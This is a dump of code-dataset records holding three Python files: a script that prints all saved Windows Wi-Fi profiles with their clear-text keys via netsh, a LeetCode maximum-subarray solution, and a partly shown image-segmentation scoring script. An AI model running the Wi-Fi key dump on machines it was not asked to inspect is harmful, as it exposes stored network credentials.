hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e57c0b31f4195a26edf8f9247751452b0807e246 | 1,709 | py | Python | wifi.py | 4yub1k/Python-Wifi-Password | 913d39fe532c566f96aa3605191d142bea759498 | [
"MIT"
] | null | null | null | wifi.py | 4yub1k/Python-Wifi-Password | 913d39fe532c566f96aa3605191d142bea759498 | [
"MIT"
] | null | null | null | wifi.py | 4yub1k/Python-Wifi-Password | 913d39fe532c566f96aa3605191d142bea759498 | [
"MIT"
] | null | null | null | #@ayuboid --- salahuddin[@]protonmail.ch/com
import subprocess
class t:
    """Helpers that read saved Wi-Fi profiles via the Windows ``netsh`` tool.

    Both methods spawn ``netsh`` subprocesses; an elevated (admin) shell is
    required for the key material to be shown.
    """

    def user(self):
        """Return the raw bytes of ``netsh wlan show profiles`` output."""
        x_1 = subprocess.Popen("netsh wlan show profiles", stdout=subprocess.PIPE)  # run IDE as admin
        # communicate() drains the pipe and returns (stdout, stderr).
        return x_1.communicate()[0]

    def password_1(self, name):
        """Print the clear-text key of every profile in *name*.

        *name* is a list of ``[label, profile_name]`` pairs as produced by
        ``t1.username()``; the profile name is ``pair[1]``.
        """
        for pswd in name:
            # The profile name is quoted because it may contain spaces;
            # strip() removes the padding left over from the split on ':'.
            x_1 = subprocess.Popen(
                r'netsh wlan show profiles name="%s" key=clear' % pswd[1].strip(),
                stdout=subprocess.PIPE)  # run IDE as admin
            stdout = x_1.communicate()[0]
            for line in stdout.decode().splitlines():
                if "Key Content" in line:
                    # split(":", 1) keeps passwords that themselves contain
                    # a ':' intact (a plain split(":") truncated them).
                    print("Username : %s\nPassword : %s " % (pswd[1], line.split(":", 1)[1]))
class t1(t):
    """Extends ``t`` with parsing of the profile list."""

    def username(self):
        """Return ``[label, profile_name]`` pairs parsed from netsh output."""
        # Decode the raw bytes and walk the report line by line.
        report_lines = self.user().decode().splitlines()
        profiles = []
        for entry in report_lines:
            # Only lines like "All User Profile : MyWifi" name a profile;
            # splitting on ':' yields ['All User Profile ', ' MyWifi'].
            if "All User Profile" in entry:
                profiles.append(entry.split(":"))
        return profiles

    def password(self):
        """Look up every saved profile and print its stored key."""
        self.password_1(self.username())
if __name__ == "__main__":
    # Only run when executed as a script, not on import.
    b = t1()
    b.password()
    # print(b.username())  # GET USERNAMES
    # You can also use os.system
| 39.744186 | 139 | 0.591574 | 238 | 1,709 | 4.184874 | 0.445378 | 0.016064 | 0.012048 | 0.034137 | 0.106426 | 0.066265 | 0.066265 | 0 | 0 | 0 | 0 | 0.015523 | 0.283792 | 1,709 | 42 | 140 | 40.690476 | 0.798203 | 0.346401 | 0 | 0.071429 | 0 | 0 | 0.11413 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0.178571 | 0.035714 | 0 | 0.321429 | 0.035714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e58014cfc6228afdc63430dc2ea3095af62a76a8 | 760 | py | Python | Dataset/Leetcode/test/53/155.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/test/53/155.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/test/53/155.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | class Solution(object):
def XXX(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
def maxSub(arr,lo,hi):
if lo == hi:return arr[lo]
mid = (lo+hi) // 2
# 左最大
left = maxSub(arr,lo,mid)
# 右最大
right = maxSub(arr,mid+1,hi)
# 中间最大
leftMid,rightMid = float("-inf"),float("-inf")
tempL,tempR = 0,0
for i in range(mid,lo-1,-1):
tempL += arr[i]
leftMid = max(leftMid,tempL)
for i in range(mid+1,hi+1):
tempR += arr[i]
rightMid = max(rightMid,tempR)
return max(left,right,leftMid+rightMid)
return maxSub(nums,0,len(nums)-1)
| 28.148148 | 56 | 0.455263 | 95 | 760 | 3.642105 | 0.4 | 0.078035 | 0.063584 | 0.063584 | 0.080925 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022124 | 0.405263 | 760 | 26 | 57 | 29.230769 | 0.743363 | 0.061842 | 0 | 0 | 0 | 0 | 0.011799 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0 | 0 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e580b0c306509aee55a5e30612158ccd86541db3 | 23,831 | py | Python | cal_metric.py | BMEngineeR/single_cell_spatial_image | 72676556218605907085a81847cb640a0bc460ea | [
"MIT"
] | 5 | 2021-04-29T12:45:42.000Z | 2021-11-06T23:22:07.000Z | cal_metric.py | OSU-BMBL/single_cell_spatial_image | 61db0da133787885e9f5f7ecc977df0620b62ad7 | [
"MIT"
] | 6 | 2021-02-26T12:36:06.000Z | 2022-02-26T11:44:05.000Z | cal_metric.py | BMEngineeR/single_cell_spatial_image | 72676556218605907085a81847cb640a0bc460ea | [
"MIT"
] | 6 | 2021-04-20T14:01:14.000Z | 2021-11-18T20:18:38.000Z | import os.path as osp
import pickle
import shutil
import tempfile
import os
import mmcv
import numpy as np
import torch
import torch.distributed as dist
from mmcv.image import tensor2imgs
from mmcv.runner import get_dist_info
import pandas as pd
import json
import cv2
from PIL import Image
from sklearn.metrics.cluster import adjusted_rand_score
import shutil
from sklearn.metrics.cluster import adjusted_rand_score, adjusted_mutual_info_score, fowlkes_mallows_score, rand_score, \
silhouette_score, calinski_harabasz_score, davies_bouldin_score
import math
from mmseg.apis.inference import inference_segmentor
from mmseg.apis.inference import init_segmentor
def testing_metric(img_path, output_folder, model, show_dir, k):
    """Segment every image in ``img_path`` with ``model``, score each result
    with :func:`cluster_heterogeneity` (the "MI" value), save the top-ranked
    segmentation overlays and per-pixel category CSVs under ``output_folder``,
    and return the best image's category map as an int32 array.

    ``k`` is the cluster count forwarded to ``inference_segmentor``;
    ``k == -1`` triggers an automatic search over k in [4, 9] on the image
    that scored best with the default clustering.
    """
    MI_list = []
    name_list = []
    k_list = []
    if k==-1:
        # Pass 1: score every image with the default clustering and remember
        # the best-scoring image name.
        for name in os.listdir(img_path):
            # NOTE(review): MI_max is re-zeroed on every iteration, so
            # optimal_name ends up being the LAST image with MI > 0 rather
            # than the global maximum — confirm whether this is intended.
            MI_max = 0
            img_name = img_path+name
            result = inference_segmentor(model, img_name, k)
            out_file=show_dir+name
            image_test = cv2.imread(img_name)
            MI = cluster_heterogeneity(image_test, result[0], 0)
            if MI_max < MI:
                MI_max = MI
                optimal_name = name
        # Pass 2: search k in [4, 9] on the selected image.
        for tmp_k in range(4, 10):
            MI_max = 0
            img_name = img_path+optimal_name
            result = inference_segmentor(model, img_name, tmp_k)
            # NOTE(review): ``name`` is stale (left over from the previous
            # loop), so out_file and the CSV below may be written under a
            # name that differs from ``optimal_name`` — verify.
            out_file=show_dir+name
            model.show_result(
                img_name,
                result,
                palette=None,
                show=False,
                out_file=out_file)
            image_test = cv2.imread(img_name)
            if not os.path.exists(output_folder+'result_temp/'):
                os.makedirs(output_folder+'result_temp/')
            np.savetxt(output_folder+'result_temp/'+name.split('.png')[0]+'.csv', result[0], delimiter=',')
            MI = cluster_heterogeneity(image_test, result[0], 0)
            if MI_max < MI:
                MI_max = MI
                optimal_k = tmp_k
        # Re-run inference with the chosen k and save the final overlay.
        result = inference_segmentor(model, img_name, optimal_k)
        model.show_result(
            img_name,
            result,
            palette=None,
            show=False,
            out_file=out_file)
        k_list.append(optimal_k)
        name_list.append(optimal_name)
        MI_list.append(MI_max)
        MI_result = {
            'name': name_list,
            'k':k_list,
            'MI': MI_list,
        }
        MI_result = pd.DataFrame(MI_result)
        MI_result = MI_result.sort_values(by=['MI'], ascending=False)
        # Persist overlays and CSVs for (at most) the five best entries.
        if len(name_list) > 5:
            MI_result_top5 = MI_result[0:5]
            name = MI_result_top5.iloc[:, 0].values
            for n in name:
                prefix = n.split('.png')[0]
                show = cv2.imread(show_dir + n)
                if not os.path.exists(output_folder + 'segmentation_map/'):
                    os.makedirs(output_folder + 'segmentation_map/')
                cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
                if not os.path.exists(output_folder+'result/'):
                    os.makedirs(output_folder+'result/')
                shutil.move(output_folder+'result_temp/'+prefix+'.csv', output_folder+'result/'+prefix+'.csv')
            # shutil.rmtree(show_dir)
            # shutil.rmtree(output_folder+'result_temp/')
            MI_result_top5.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
        else:
            name = MI_result.iloc[:, 0].values
            for n in name:
                prefix = n.split('.png')[0]
                show = cv2.imread(show_dir + n)
                if not os.path.exists(output_folder + 'segmentation_map/'):
                    os.makedirs(output_folder + 'segmentation_map/')
                cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
                if not os.path.exists(output_folder + 'result/'):
                    os.makedirs(output_folder + 'result/')
                shutil.move(output_folder + 'result_temp/' + prefix + '.csv', output_folder + 'result/' + prefix + '.csv')
            # The temporary folders are only cleaned in this branch.
            shutil.rmtree(show_dir)
            shutil.rmtree(output_folder + 'result_temp/')
            MI_result.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
        # Reload the best-ranked category map from the CSV just written.
        top1_name = MI_result.iloc[:, 0].values[0]
        top1_csv_name = output_folder + 'result/' + top1_name.split('.png')[0] + '.csv'
        top1_category_map = np.loadtxt(top1_csv_name,dtype=np.int32, delimiter=",")
    else:
        # Fixed k: segment and score every image, then rank by MI.
        for name in os.listdir(img_path):
            img_name = img_path+name
            name_list.append(name)
            result = inference_segmentor(model, img_name, k)
            out_file=show_dir+name
            print(out_file)
            model.show_result(
                img_name,
                result,
                palette=None,
                show=False,
                out_file=out_file)
            image_test = cv2.imread(img_name)
            if not os.path.exists(output_folder+'result_temp/'):
                os.makedirs(output_folder+'result_temp/')
            np.savetxt(output_folder+'result_temp/'+name.split('.png')[0]+'.csv', result[0], delimiter=',')
            MI = cluster_heterogeneity(image_test, result[0], 0)
            MI_list.append(MI)
        MI_result = {
            'name': name_list,
            'MI': MI_list,
        }
        MI_result = pd.DataFrame(MI_result)
        MI_result = MI_result.sort_values(by=['MI'], ascending=False)
        if len(name_list) > 5:
            MI_result_top5 = MI_result[0:5]
            # print(MI_result_top5)
            name = MI_result_top5.iloc[:, 0].values
            for n in name:
                prefix = n.split('.png')[0]
                show = cv2.imread(show_dir + n)
                if not os.path.exists(output_folder + 'segmentation_map/'):
                    os.makedirs(output_folder + 'segmentation_map/')
                cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
                if not os.path.exists(output_folder+'result/'):
                    os.makedirs(output_folder+'result/')
                shutil.move(output_folder+'result_temp/'+prefix+'.csv', output_folder+'result/'+prefix+'.csv')
            # shutil.rmtree(show_dir)
            # shutil.rmtree(output_folder+'result_temp/')
            MI_result_top5.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
        else:
            name = MI_result.iloc[:, 0].values
            for n in name:
                prefix = n.split('.png')[0]
                show = cv2.imread(show_dir + n)
                if not os.path.exists(output_folder + 'segmentation_map/'):
                    os.makedirs(output_folder + 'segmentation_map/')
                cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
                if not os.path.exists(output_folder + 'result/'):
                    os.makedirs(output_folder + 'result/')
                shutil.move(output_folder + 'result_temp/' + prefix + '.csv', output_folder + 'result/' + prefix + '.csv')
            shutil.rmtree(show_dir)
            shutil.rmtree(output_folder + 'result_temp/')
            MI_result.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
        top1_name = MI_result.iloc[:, 0].values[0]
        top1_csv_name = output_folder + 'result/' + top1_name.split('.png')[0] + '.csv'
        top1_category_map = np.loadtxt(top1_csv_name,dtype=np.int32, delimiter=",")
        # shutil.rmtree(output_folder + 'result/')
    return top1_category_map
def evaluation_metric(adata, img_path, output_folder, model, show_dir, label_path, k):
    """Same pipeline as :func:`testing_metric`, but with ground-truth labels:
    every segmentation is additionally scored against the annotations in
    ``label_path`` via :func:`calculate` (ARI/AMI/FMI/RI), and those columns
    are written to ``top5_MI_value.csv`` next to the MI score.

    Returns the category map (int32 array) of the image ranked first by MI.
    ``k == -1`` triggers an automatic search over k in [4, 9].
    """
    MI_list = []
    name_list = []
    ARI_list = []
    AMI_list = []
    FMI_list = []
    RI_list = []
    k_list = []
    if k == -1:
        # Pass 1: score every image with the default clustering.
        for name in os.listdir(img_path):
            # NOTE(review): MI_max is re-zeroed every iteration, so
            # optimal_name is the LAST image with MI > 0, not the global
            # maximum — confirm intent (same pattern as testing_metric).
            MI_max = 0
            img_name = img_path+name
            result = inference_segmentor(model, img_name, k)
            out_file=show_dir+name
            image_test = cv2.imread(img_name)
            MI = cluster_heterogeneity(image_test, result[0], 0)
            if MI_max < MI:
                MI_max = MI
                optimal_name = name
        # Pass 2: search k in [4, 9] on the selected image, tracking the
        # external metrics of the chosen configuration as well.
        for tmp_k in range(4, 10):
            MI_max = 0
            img_name = img_path+optimal_name
            result = inference_segmentor(model, img_name, tmp_k)
            # NOTE(review): ``name`` is stale here (from the previous loop);
            # out_file and the CSV below may not match ``optimal_name``.
            out_file=show_dir+name
            model.show_result(
                img_name,
                result,
                palette=None,
                show=False,
                out_file=out_file)
            image_test = cv2.imread(img_name)
            if not os.path.exists(output_folder+'result_temp/'):
                os.makedirs(output_folder+'result_temp/')
            np.savetxt(output_folder+'result_temp/'+name.split('.png')[0]+'.csv', result[0], delimiter=',')
            MI = cluster_heterogeneity(image_test, result[0], 0)
            name0, ARI, AMI, FMI, RI = calculate(adata, result[0], img_name, label_path)
            if MI_max < MI:
                MI_max = MI
                optimal_k = tmp_k
                optimal_ARI = ARI
                optimal_MI = MI
                optimal_AMI = AMI
                optimal_FMI = FMI
                optimal_RI = RI
        # Re-run inference with the chosen k and save the final overlay.
        result = inference_segmentor(model, img_name, optimal_k)
        model.show_result(
            img_name,
            result,
            palette=None,
            show=False,
            out_file=out_file)
        k_list.append(optimal_k)
        name_list.append(optimal_name)
        MI_list.append(optimal_MI)
        ARI_list.append(optimal_ARI)
        AMI_list.append(optimal_AMI)
        FMI_list.append(optimal_FMI)
        RI_list.append(optimal_RI)
        MI_result = {
            'name': name_list,
            'k':k_list,
            "ARI": ARI_list,
            "AMI": AMI_list,
            "FMI": FMI_list,
            "RI": RI_list,
            'MI': MI_list,
        }
        MI_result = pd.DataFrame(MI_result)
        MI_result = MI_result.sort_values(by=['MI'], ascending=False)
        # Persist overlays and CSVs for (at most) the five best entries.
        if len(name_list) > 5:
            MI_result_top5 = MI_result[0:5]
            # print(MI_result_top5)
            name = MI_result_top5.iloc[:, 0].values
            for n in name:
                prefix = n.split('.png')[0]
                show = cv2.imread(show_dir + n)
                if not os.path.exists(output_folder + 'segmentation_map/'):
                    os.makedirs(output_folder + 'segmentation_map/')
                cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
                if not os.path.exists(output_folder+'result/'):
                    os.makedirs(output_folder+'result/')
                shutil.move(output_folder+'result_temp/'+prefix+'.csv', output_folder+'result/'+prefix+'.csv')
            shutil.rmtree(show_dir)
            shutil.rmtree(output_folder+'result_temp/')
            MI_result_top5.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
        else:
            name = MI_result.iloc[:, 0].values
            for n in name:
                prefix = n.split('.png')[0]
                show = cv2.imread(show_dir + n)
                if not os.path.exists(output_folder + 'segmentation_map/'):
                    os.makedirs(output_folder + 'segmentation_map/')
                cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
                if not os.path.exists(output_folder + 'result/'):
                    os.makedirs(output_folder + 'result/')
                shutil.move(output_folder + 'result_temp/' + prefix + '.csv', output_folder + 'result/' + prefix + '.csv')
            shutil.rmtree(show_dir)
            shutil.rmtree(output_folder + 'result_temp/')
            MI_result.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
        # Reload the best-ranked category map, then drop the result folder.
        top1_name = MI_result.iloc[:, 0].values[0]
        top1_csv_name = output_folder + 'result/' + top1_name.split('.png')[0] + '.csv'
        top1_category_map = np.loadtxt(top1_csv_name,dtype=np.int32, delimiter=",")
        shutil.rmtree(output_folder + 'result/')
    else:
        # Fixed k: segment, score against labels, and rank by MI.
        for name in os.listdir(img_path):
            img_name = img_path+name
            name_list.append(name)
            result = inference_segmentor(model, img_name, k)
            name0, ARI, AMI, FMI, RI = calculate(adata, result[0], img_name, label_path)
            ARI_list.append(ARI)
            AMI_list.append(AMI)
            FMI_list.append(FMI)
            RI_list.append(RI)
            # print(result[0])
            print(img_name)
            out_file=show_dir+name
            # print(out_file)
            model.show_result(
                img_name,
                result,
                palette=None,
                show=False,
                out_file=out_file)
            image_test = cv2.imread(img_name)
            if not os.path.exists(output_folder+'result_temp/'):
                os.makedirs(output_folder+'result_temp/')
            np.savetxt(output_folder+'result_temp/'+name.split('.png')[0]+'.csv', result[0], delimiter=',')
            MI = cluster_heterogeneity(image_test, result[0], 0)
            MI_list.append(MI)
        MI_result = {
            'name': name_list,
            "ARI": ARI_list,
            "AMI": AMI_list,
            "FMI": FMI_list,
            "RI": RI_list,
            'MI': MI_list,
        }
        MI_result = pd.DataFrame(MI_result)
        MI_result = MI_result.sort_values(by=['MI'], ascending=False)
        if len(name_list) > 5:
            MI_result_top5 = MI_result[0:5]
            # print(MI_result_top5)
            name = MI_result_top5.iloc[:, 0].values
            for n in name:
                prefix = n.split('.png')[0]
                show = cv2.imread(show_dir + n)
                if not os.path.exists(output_folder + 'segmentation_map/'):
                    os.makedirs(output_folder + 'segmentation_map/')
                cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
                if not os.path.exists(output_folder+'result/'):
                    os.makedirs(output_folder+'result/')
                shutil.move(output_folder+'result_temp/'+prefix+'.csv', output_folder+'result/'+prefix+'.csv')
            shutil.rmtree(show_dir)
            shutil.rmtree(output_folder+'result_temp/')
            MI_result_top5.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
        else:
            name = MI_result.iloc[:, 0].values
            for n in name:
                prefix = n.split('.png')[0]
                show = cv2.imread(show_dir + n)
                if not os.path.exists(output_folder + 'segmentation_map/'):
                    os.makedirs(output_folder + 'segmentation_map/')
                cv2.imwrite(output_folder + 'segmentation_map/' + n, show)
                if not os.path.exists(output_folder + 'result/'):
                    os.makedirs(output_folder + 'result/')
                shutil.move(output_folder + 'result_temp/' + prefix + '.csv', output_folder + 'result/' + prefix + '.csv')
            shutil.rmtree(show_dir)
            shutil.rmtree(output_folder + 'result_temp/')
            MI_result.to_csv(output_folder + 'top5_MI_value.csv', index=True, header=True)
        top1_name = MI_result.iloc[:, 0].values[0]
        top1_csv_name = output_folder + 'result/' + top1_name.split('.png')[0] + '.csv'
        top1_category_map = np.loadtxt(top1_csv_name,dtype=np.int32, delimiter=",")
        shutil.rmtree(output_folder + 'result/')
    return top1_category_map
def cluster_heterogeneity(image_test, category_map, background_category):
    """Moran's-I-style heterogeneity score of a segmentation.

    Builds an adjacency matrix ``W`` of cluster labels that touch each other
    (scanning rows and columns of ``category_map``), computes a Moran-like
    index per BGR channel of ``image_test`` from per-cluster mean
    intensities, and returns the RMS of the three channel indices.

    NOTE(review): the double scan indexes both axes with
    ``category_map.shape[0]``, and the mean uses ``image_test.shape[0] ** 2``
    — both assume a SQUARE map/image; confirm callers only pass squares.
    """
    if len(category_map.shape) > 2:
        # Collapse a colour-coded map to single-channel labels.
        category_map = cv2.cvtColor(category_map, cv2.COLOR_BGR2GRAY)
    category_list = np.unique(category_map)
    W = np.zeros((len(category_list), len(category_list)))
    for i in range(category_map.shape[0]):
        # flag1/flag2 track the previous label along row i / column i;
        # every label change marks the two labels as adjacent in W.
        flag1 = category_map[i][0]
        flag2 = category_map[0][i]
        for j in range(category_map.shape[0]):
            if category_map[i][j] != flag1:  # label change along the row
                index1 = np.where(category_list == flag1)[0][0]
                index2 = np.where(category_list == category_map[i][j])[0][0]
                W[index1][index2] = 1
                W[index2][index1] = 1
                flag1 = category_map[i][j]
            if category_map[j][i] != flag2:  # label change along the column
                index1 = np.where(category_list == flag2)[0][0]
                index2 = np.where(category_list == category_map[j][i])[0][0]
                W[index1][index2] = 1
                W[index2][index1] = 1
                flag2 = category_map[j][i]
    W = W[1:, 1:]  # drop the first label — presumably the background; np.unique sorts, so this assumes background is the smallest label (TODO confirm)
    # print(W)
    category_num = W.shape[0]
    # print(R.shape)
    MI_list = []
    image_test_ori = image_test
    # Calculate the average color value of each channel in each cluster
    for channel in range(3):
        image_test = image_test_ori[:, :, channel]
        # print(image_test)
        num = 0
        gray_list = []
        gray_mean = 0
        for category in category_list:
            pixel_x, pixel_y = np.where(category_map == category)
            if category == background_category:
                # Background pixels are excluded from the weighted mean.
                num = len(pixel_x)
                continue
            gray = []
            for i in range(len(pixel_x)):
                gray.append(image_test[pixel_x[i], pixel_y[i]])
            gray_value = np.mean(gray)
            gray_list.append(gray_value)
            gray_mean += gray_value * len(pixel_x)
        # Pixel-weighted mean intensity over all non-background clusters.
        gray_mean = gray_mean / (image_test.shape[0] ** 2 - num)
        n = W.shape[0]
        a = 0
        b = 0
        for p in range(n):
            index, = np.where(W[p] == 1)
            for q in range(len(index)):
                # Numerator: |deviation products| over adjacent cluster pairs.
                a += abs((gray_list[p] - gray_mean) * (gray_list[index[q]] - gray_mean))
            b += (gray_list[p] - gray_mean) ** 2
        # NOTE(review): divides by b * sum(W); both are 0 when there is a
        # single non-background cluster — ZeroDivisionError risk.
        MI = n * a / (b * np.sum(W))
        MI_list.append(MI)
    # print(MI_list)
    # Root-mean-square of the three per-channel indices.
    MI = math.sqrt((MI_list[0] ** 2 + MI_list[1] ** 2 + MI_list[2] ** 2) / 3)
    # print(MI)
    return MI
def calculate(adata, output, img_path, label_path):
    """Score a predicted category map against the annotated layer labels.

    Builds the ground-truth label image from ``label_path``, flattens both
    images, drops every pixel whose ground-truth label is 0 (unannotated),
    and returns ``(image_name, ARI, AMI, FMI, RI)``.
    """
    img_name = img_path.split('/')[-1]  # eg:151507_50_32_....png
    ground_truth = save_spot_RGB_to_image(label_path, adata).flatten().tolist()
    predicted = np.array(output).flatten().tolist()
    side = adata.uns["img_shape"]
    # Keep only pixels that carry an annotation (label != 0).
    label_final = []
    output_final = []
    for truth, guess in zip(ground_truth[:side ** 2], predicted[:side ** 2]):
        if truth != 0:
            label_final.append(truth)
            output_final.append(guess)
    ARI = adjusted_rand_score(label_final, output_final)
    AMI = adjusted_mutual_info_score(label_final, output_final)
    FMI = fowlkes_mallows_score(label_final, output_final)
    RI = rand_score(label_final, output_final)
    print('name', img_name)
    print('ARI:', ARI)
    return img_name, ARI, AMI, FMI, RI
def save_spot_RGB_to_image(label_path, adata):
    """Rasterize per-spot layer annotations into a label image.

    Reads ``label_path`` (CSV with a ``barcode`` column and a layer column,
    one row per spot), paints a ``2*radius`` square of the layer's integer
    code (Layer1..Layer6 -> 1..6, WM -> 7, anything else -> 0) at each
    spot's full-resolution position, then nearest-neighbour resizes the
    canvas to ``adata.uns["img_shape"]`` squared.

    Returns the resized uint8 label image.
    """
    X = pd.read_csv(label_path)
    X = X.sort_values(by=['barcode'])
    # Spots in adata and in the label file must line up one-to-one.
    assert all(adata.obs.index == X.iloc[:, 0].values)
    layers = X.iloc[:, 1].values
    spot_row = adata.obs["pxl_col_in_fullres"]
    spot_col = adata.obs["pxl_row_in_fullres"]
    # Half the fiducial diameter, rounded up — the painted square's half-side.
    radius = int(0.5 * adata.uns['fiducial_diameter_fullres'] + 1)
    max_row = max_col = int((2000 / adata.uns['tissue_hires_scalef']) + 1)
    # dtype=np.int (removed in NumPy 1.24) replaced by creating the canvas
    # directly as uint8, which is what the old astype(np.uint8) produced.
    img = np.zeros(shape=(max_row + 1, max_col + 1), dtype=np.uint8)
    # One integer code per annotated layer; replaces the old elif chain.
    layer_codes = {
        'Layer1': 1,
        'Layer2': 2,
        'Layer3': 3,
        'Layer4': 4,
        'Layer5': 5,
        'Layer6': 6,
        'WM': 7,
    }
    for index in range(len(layers)):
        code = layer_codes.get(layers[index])
        if code is None:
            # Unknown/unannotated layer labels leave the canvas at 0,
            # exactly as the original elif chain did.
            continue
        img[(spot_row[index] - radius):(spot_row[index] + radius),
            (spot_col[index] - radius):(spot_col[index] + radius)] = code
    shape = adata.uns["img_shape"]
    # INTER_NEAREST keeps labels discrete (no interpolated label values).
